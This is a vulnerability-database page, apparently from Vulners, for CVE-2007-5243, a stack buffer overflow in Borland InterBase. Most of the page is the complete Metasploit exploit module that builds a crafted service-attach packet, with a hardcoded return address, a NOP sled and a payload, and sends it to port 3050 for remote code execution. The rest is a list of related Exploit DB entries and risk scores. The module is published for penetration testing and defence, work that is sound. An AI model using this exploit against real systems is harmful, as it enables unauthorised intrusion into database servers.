Borland InterBase INET_connect() Buffer Overflow

🗓️ 04 Oct 2007 03:03:13Reported by Ramon de C Valle <[email protected]>, Adriano Lima <[email protected]>Type

Borland InterBase stack buffer overflow by specially crafted service attach reques

Reporter	Title	Published	Views	Family All 41
Circl	CVE-2007-5243	3 Jul 201000:00	–	circl
CVE	CVE-2007-5243	6 Oct 200717:00	–	cve
Cvelist	CVE-2007-5243	6 Oct 200717:00	–	cvelist
Exploit DB	Borland Interbase 2007/2007 SP2 - 'jrd8_create_database' Remote Buffer Overflow (Metasploit)	3 Oct 200700:00	–	exploitdb
Exploit DB	Borland Interbase 2007/2007 SP2 - 'INET_connect' Remote Buffer Overflow (Metasploit)	3 Oct 200700:00	–	exploitdb
Exploit DB	Firebird Relational Database - 'SVC_attach()' Remote Buffer Overflow (Metasploit)	3 Jul 201000:00	–	exploitdb
Exploit DB	Firebird Relational Database - 'isc_create_database()' Remote Buffer Overflow (Metasploit)	3 Jul 201000:00	–	exploitdb
Exploit DB	Borland Interbase - 'isc_create_database()' Remote Buffer Overflow (Metasploit)	3 Jul 201000:00	–	exploitdb
Exploit DB	Firebird Relational Database - 'isc_attach_database()' Remote Buffer Overflow (Metasploit)	3 Jul 201000:00	–	exploitdb
Exploit DB	Borland Interbase - 'isc_attach_database()' Remote Buffer Overflow (Metasploit)	3 Jul 201000:00	–	exploitdb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'Borland InterBase INET_connect() Buffer Overflow',
      'Description'	=> %q{
        This module exploits a stack buffer overflow in Borland InterBase
        by sending a specially crafted service attach request.
      },
      'Author'	=>
        [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
      'Arch'		=> ARCH_X86,
      'Platform'	=> 'linux',
      'References'	=>
        [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38605' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
      'Privileged'	=> true,
      'License'	=> MSF_LICENSE,
      'Payload'	=>
        {
          'Space' => 512,
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
        },
      'Targets'	=>
        [
          # 0x0804d2ee 5b5e5f5dc3
          [
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
            { 'Ret' => 0x0804d2ee }
          ],
        ],
      'DefaultTarget'	=> 0,
      'DisclosureDate'  => '2007-10-03'
    ))

    register_options(
      [
        Opt::RPORT(3050)
      ],
      self.class
    )

  end

  def exploit

    connect

    # Attach database
    op_attach = 19

    # Create database
    op_create = 20

    # Service attach
    op_service_attach = 82

    length = 161
    remainder = length.remainder(4)
    padding = 0

    if remainder > 0
      padding = (4 - remainder)
    end

    buf = ''

    # Operation/packet type
    buf << [op_service_attach].pack('N')

    # Id
    buf << [0].pack('N')

    # Length
    buf << [length].pack('N')

    # Random alpha data
    buf << rand_text_alpha(length - 5)

    # Target
    buf << [target.ret].pack('L')

    # Separator
    buf << ':'

    # Padding
    buf << "\x00" * padding

    # Database parameter block

    # Length
    buf << [1024].pack('N')

    # It will return into this nop block
    buf << make_nops(1024 - payload.encoded.length)

    # Payload
    buf << payload.encoded

    sock.put(buf)

    handler

  end
end

02 Oct 2020 20:00Current

7.4High risk

Vulners AI Score7.4

CVSS 29.3

EPSS0.83271